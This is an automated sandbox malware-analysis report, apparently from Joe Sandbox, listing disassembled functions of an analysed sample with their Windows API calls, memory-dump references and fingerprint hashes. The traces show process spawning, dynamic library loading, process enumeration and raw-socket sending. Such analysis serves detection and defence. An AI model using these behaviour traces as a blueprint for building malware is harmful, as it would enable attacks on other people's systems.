                                                                    • ??2@YAPAXI@Z.MSVCRT(-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 10001D4D
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 10001D59
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 10001DB1
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 10001DBA
                                                                    • _CxxThrowException.MSVCRT(?,10010AE0), ref: 10001DD7
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 10001DE6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 10001DF4
                                                                      • Part of subcall function 10001E6D: ??2@YAPAXI@Z.MSVCRT(10007ED6,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001E8E
                                                                      • Part of subcall function 10001E6D: memcpy.MSVCRT(00000000,000000C8,10007ED6,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001EA6
                                                                      • Part of subcall function 10001E6D: ??3@YAXPAX@Z.MSVCRT(0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001EFD
                                                                      • Part of subcall function 10001E6D: ??2@YAPAXI@Z.MSVCRT(00000001,0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001F05
                                                                      • Part of subcall function 10001E6D: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0), ref: 10001F14
                                                                      • Part of subcall function 10001E6D: ??3@YAXPAX@Z.MSVCRT(00000000,0000022C,00000001,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001F3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??3@$??2@memcpy$ExceptionThrowmemcmp$H_prolog
                                                                    • String ID:
                                                                    • API String ID: 1493374972-0
                                                                    • Opcode ID: 4b1fdf1ea01d5ff0d7712f43459c6e805e43086e5ce5c99aec9822d9619c269a
                                                                    • Instruction ID: 7afd09c710f940f47f73cce2c9c93733a61324b861e6b9946357802098d20c5d
                                                                    • Opcode Fuzzy Hash: 4b1fdf1ea01d5ff0d7712f43459c6e805e43086e5ce5c99aec9822d9619c269a
                                                                    • Instruction Fuzzy Hash: 7A518475A0010AABEF04DFA4CC42EEE77B9EF486D0F50412AF505A7186DB74EA45CB91
                                                                    Function 0040DD87 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 113threadprocessstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040DDA3
                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 0040DDC0
                                                                    • GetEnvironmentVariableA.KERNEL32(10012D24,?,00000104), ref: 0040DDDB
                                                                    • lstrcpy.KERNEL32(?,10012D18), ref: 0040DDF5
                                                                    • GetCurrentProcess.KERNEL32(00000100), ref: 0040DE59
                                                                    • GetCurrentThread.KERNEL32 ref: 0040DE6A
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000044,?), ref: 0040DE90
                                                                    • ResumeThread.KERNEL32(?), ref: 0040DEAB
                                                                    • GetCurrentProcess.KERNEL32(00000020), ref: 0040DEB8
                                                                    • GetCurrentThread.KERNEL32 ref: 0040DEC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread$Name$CreateEnvironmentFileModulePathResumeShortVariablelstrcpy
                                                                    • String ID: D
                                                                    • API String ID: 474313888-2746444292
                                                                    • Opcode ID: 6d6a3810a3ff98d1a818007ac0a4a6722265b29b39479b547dd4eb1410b57027
                                                                    • Instruction ID: b4ef4a4e28cb620e9a2440b99920a1b6c97c05269481ab4fc3d544fd7c4eb548
                                                                    • Opcode Fuzzy Hash: 6d6a3810a3ff98d1a818007ac0a4a6722265b29b39479b547dd4eb1410b57027
                                                                    • Instruction Fuzzy Hash: 8031FDB2D0062CFEEB109BE0CC89EDB7B7CEB44351F104566F605E6194DB759A44CB61
                                                                    Function 00410644 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 94filelibrarysleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00410649
                                                                    • memset.MSVCRT ref: 00410675
                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000,?,0000005C,?), ref: 004106B0
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004106C1
                                                                    • SetFilePointer.KERNEL32(?,00000040,00000000,00000000), ref: 004106D3
                                                                    • WriteFile.KERNEL32(?,?,00002710,?,00000000), ref: 004106F1
                                                                    • LoadLibraryA.KERNEL32(10013DF0,10013E00), ref: 00410707
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041070E
                                                                    • Sleep.KERNEL32(00000000), ref: 00410717
                                                                    • CloseHandle.KERNEL32(?), ref: 00410732
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$AddressCloseCreateH_prologHandleLibraryLoadPointerProcSizeSleepWritememset
                                                                    • String ID: KERNEL32.dll
                                                                    • API String ID: 1496718816-254546324
                                                                    • Opcode ID: d95cf6921070a3d0606e8b335ca360e22b21236b34dd118d265a5ad6dbb74d0a
                                                                    • Instruction ID: 0a6a8ba30645a08d825a5043dedfeafda3bbcea105ecb3b58f0c096334c68bc5
                                                                    • Opcode Fuzzy Hash: d95cf6921070a3d0606e8b335ca360e22b21236b34dd118d265a5ad6dbb74d0a
                                                                    • Instruction Fuzzy Hash: 77316B7290021CBFEB11AFA4DD89EEF7B7DEB05398F004126F516A6191CB749E84CB64
                                                                    Function 1000A383 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000A394
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 1000A3A8
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 1000A3B2
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 1000A3BD
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 1000A3F5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000A414
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000A41F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                                                    • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                    • API String ID: 1314729832-4285911020
                                                                    • Opcode ID: 1597d119bdd4340409934fc035f21a73f1f8bbb5134f4146e10c90239e8cd71b
                                                                    • Instruction ID: 5bc2e2efb2ebdc37442e72abf7ad3c4ede563df5b677971c453c906c9641fef3
                                                                    • Opcode Fuzzy Hash: 1597d119bdd4340409934fc035f21a73f1f8bbb5134f4146e10c90239e8cd71b
                                                                    • Instruction Fuzzy Hash: 6F117035901228BBEB11DBA5CC8CFEEBFB8EF45791F004155F904E6144DB78EA84CA60
                                                                    Function 100018ED Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 52networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 100018F2
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10001943
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000194E
                                                                    • memcpy.MSVCRT(?,?,00000006), ref: 10001980
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateEventH_prologStartupmemcpy
                                                                    • String ID: A$G$Q$Rsjshd fzfgkqcm$f$f$s
                                                                    • API String ID: 2412012656-3315494269
                                                                    • Opcode ID: 104a1d0a91fd37328b0f045415fccb69181a38f9aa0c3305a1845c4683449357
                                                                    • Instruction ID: 552ae35b8cdd0f66e1ae7642cf2388ae71e75a36ebd57896a2e2d44db462b0ec
                                                                    • Opcode Fuzzy Hash: 104a1d0a91fd37328b0f045415fccb69181a38f9aa0c3305a1845c4683449357
                                                                    • Instruction Fuzzy Hash: 3811B470804388DEE711CBA8C945BDFBBF8DF15784F00055DE08252686DBB56748C7B2
                                                                    Function 00409C59 Relevance: 18.2, APIs: 12, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00409C5E
                                                                    • memcmp.MSVCRT(?,?,00000006,00000000,00000000,00019000), ref: 00409C8B
                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 00409CF4
                                                                    • memcmp.MSVCRT(?,?,00000006,?,00000000,00000006,00000000,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?), ref: 00409D03
                                                                    • _CxxThrowException.MSVCRT(?,10010AE0), ref: 00409D1F
                                                                    • memcpy.MSVCRT(00000006,00000000,00000004,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 00409D37
                                                                    • ??2@YAPAXI@Z.MSVCRT(-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 00409D99
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 00409DA5
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 00409DFD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 00409E06
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,10010AE0,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 00409E32
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,10010AE0,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 00409E40
                                                                      • Part of subcall function 00409EB9: memcpy.MSVCRT(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409EF2
                                                                      • Part of subcall function 00409EB9: ??2@YAPAXI@Z.MSVCRT(00000001,?,?,00000000,00000000,00000004,00000000,00000004,?,00000004,?,00000006,?,00000000,00000000), ref: 00409F51
                                                                      • Part of subcall function 00409EB9: memcpy.MSVCRT(00000000,?,00000001,00000001,?,?,00000000,00000000,00000004,00000000,00000004,?,00000004,?,00000006), ref: 00409F60
                                                                      • Part of subcall function 00409EB9: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,00000004,?,00000004,?,00000006,?,00000000,00000000), ref: 00409F88
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??3@$memcpy$??2@$memcmp$ExceptionH_prologThrow
                                                                    • String ID:
                                                                    • API String ID: 3363115059-0
                                                                    • Opcode ID: a3a567ef4a5a6548c03163d85bec3885f239d7517735be33c6e457df80fc98d3
                                                                    • Instruction ID: 4c2736c7baf76f3feb491e26631abb7857e55f45f7b795584f27aaa64cf3db6e
                                                                    • Opcode Fuzzy Hash: a3a567ef4a5a6548c03163d85bec3885f239d7517735be33c6e457df80fc98d3
                                                                    • Instruction Fuzzy Hash: 7A516671A00209ABDF14EFA5C9429EF77A9AF48704F40403FF505B72C2DB789E558B99
                                                                    Function 0040C7FE Relevance: 18.1, APIs: 12, Instructions: 98networksleepstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C82A
                                                                    • htons.WS2_32(100149C4), ref: 0040C83F
                                                                      • Part of subcall function 0040A17B: inet_addr.WS2_32(?), ref: 0040A17F
                                                                      • Part of subcall function 0040A17B: gethostbyname.WS2_32(?), ref: 0040A18D
                                                                    • wsprintfA.USER32 ref: 0040C86A
                                                                    • strlen.MSVCRT ref: 0040C877
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0040C89E
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 0040C8AD
                                                                    • send.WS2_32(00000000,?,?,00000000), ref: 0040C8F2
                                                                    • Sleep.KERNEL32(00000001), ref: 0040C8F9
                                                                    • closesocket.WS2_32(00000000), ref: 0040C905
                                                                    • Sleep.KERNEL32(0000001E), ref: 0040C90D
                                                                    • closesocket.WS2_32(?), ref: 0040C927
                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 0040C92F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleepclosesocket$ExitThreadUserconnectgethostbynamehtonsinet_addrmemsetsendsocketstrlenwsprintf
                                                                    • String ID:
                                                                    • API String ID: 628221110-0
                                                                    • Opcode ID: 2d41cd5358ad072f5562e55cc8da09cd48da758b224140b7f6e7e2fbd0c3a40a
                                                                    • Instruction ID: 09792941f6965b435bd65e26810e53a7ff833e604c8ec5ab3c89db62340472e5
                                                                    • Opcode Fuzzy Hash: 2d41cd5358ad072f5562e55cc8da09cd48da758b224140b7f6e7e2fbd0c3a40a
                                                                    • Instruction Fuzzy Hash: F83174B195032CBAEB109BA0CC89FEE777CEF05754F008161F601A61D1D7B85B858BA9
                                                                    Function 0040D51B Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177stringprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D537
                                                                    • strlen.MSVCRT ref: 0040D57E
                                                                    • lstrcpy.KERNEL32(?,?), ref: 0040D5AC
                                                                    • memset.MSVCRT ref: 0040D5E4
                                                                    • wsprintfA.USER32 ref: 0040D5FC
                                                                    • memset.MSVCRT ref: 0040D60B
                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0040D661
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040D6BB
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040D701
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$lstrcpy$CreateEnvironmentExpandProcessStringsstrlenwsprintf
                                                                    • String ID: D
                                                                    • API String ID: 3955990989-2746444292
                                                                    • Opcode ID: c5174d6f4b2b731e8697708b3a9479c48f8d6d603971aa4a800daaf736ce8fc1
                                                                    • Instruction ID: 6bf3195cfd076741d1c62f3d16f3e6d4a0e9c02f18faa6457a942991ae3842b2
                                                                    • Opcode Fuzzy Hash: c5174d6f4b2b731e8697708b3a9479c48f8d6d603971aa4a800daaf736ce8fc1
                                                                    • Instruction Fuzzy Hash: ED515FB2D0021CBEEF109BE4CD89EEB777CEB45349F1044A6F605F6180D6759B898BA4
                                                                    Function 0040C588 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 151networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C5BD
                                                                      • Part of subcall function 0040A17B: inet_addr.WS2_32(?), ref: 0040A17F
                                                                      • Part of subcall function 0040A17B: gethostbyname.WS2_32(?), ref: 0040A18D
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040C5F6
                                                                    • wsprintfA.USER32 ref: 0040C668
                                                                    • inet_addr.WS2_32(00000000), ref: 0040C69A
                                                                    • memcpy.MSVCRT(?,00000045,00000014), ref: 0040C6EF
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000045,00000014), ref: 0040C701
                                                                    • sendto.WS2_32(?,?,0000041C,00000000,00000002,00000010), ref: 0040C72E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
